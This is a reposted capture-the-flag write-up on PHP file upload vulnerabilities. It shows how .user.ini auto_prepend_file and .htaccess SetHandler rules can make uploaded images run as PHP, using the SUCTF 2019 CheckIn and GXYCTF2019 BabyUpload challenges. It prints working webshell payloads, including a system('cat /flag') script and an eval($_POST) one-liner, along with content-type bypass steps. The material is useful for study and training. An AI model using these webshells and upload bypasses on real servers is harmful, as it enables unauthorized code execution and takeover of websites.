File upload vulnerability (.user.ini and .htaccess)

Others 2021-03-22 12:34:59 views: null

File upload vulnerability (.user.ini and .htaccess)

一 、 user.ini

.user.ini is actually a php.ini that can be "customized" by the user. The settings we can customize are the settings with the mode "PHP_INI_PERDIR, PHP_INI_USER". In fact, all modes other than PHP_INI_SYSTEM (including PHP_INI_ALL) can be set through .user.ini.

​ Unlike php.ini, .user.ini is an ini file that can be dynamically loaded. That is to say, after I modify the .user.ini, I don’t need to restart the server middleware. I only need to wait for the time set by user_ini.cache_ttl (the default is 300 seconds) before it can be reloaded.

We can easily construct a "backdoor" with the help of the .user.ini file. auto_append_file, auto_prepend_file

auto_prepend_file=01.gif

01.gif is the file to be included.

Therefore, we can easily make all php files "automatically" include a certain file with the help of .user.ini, and this file can be a normal php file or a webshell containing a sentence.

Sample question: [SUCTF 2019]CheckIn

1. The test found:

Server is nginx

File content cannot contain<?

php exif_imagetype()function, just add the image file header GIF89a

2. After reading .user.inithe analysis, our thinking should be clearer, we can upload one like this .user.ini:

GIF89a
auto_prepend_file=a.jpg

image-20201223092557699

3. At this time, we noticed that there is still an index.php in the upload directory, we just need an executable php file in this directory, then this simply exposes the test point .user.ini, it seems that this idea should be feasible

Then upload a picture like this: a.jpg:

GIF89a
<script language='php'>system('cat /flag');</script>

image-20201223092707822Finally, we visit http://9f26d33b-a50f-44fd-8485-c2721470c2a1.node3.buuoj.cn/uploads/e2e7ec165ba05a5e1f3198caa7e22b54/index.php

image-20201223092758787You can get the flag

Two, .htaccess

1. Generally .htaccess can be used to leave a backdoor and bypass the blacklist

Create a txt write

AddType  application/x-httpd-php

Let all files parse as php

2. Leave the backdoor and add php parsing rules in .htaccess

Similar to parsing the file name containing 1 into php

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

12345.png will be executed in php

Example: [GXYCTF2019]BabyUpload

1. File type bypass:

Content-Type: image/jpeg

2. First upload a .htaccess file with the following content

SetHandler application/x-httpd-php

image-20201222231123433

3. The suffix of the file name cannot start with ph, and the file content is filtered. <?
Upload such a picture horse:

GIF89a?
<script language="php">eval($_POST['a']);</script>

image-20201222231324452

4. On the Ant Sword

img

Guess you like

Origin blog.csdn.net/weixin_49298265/article/details/111572316
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com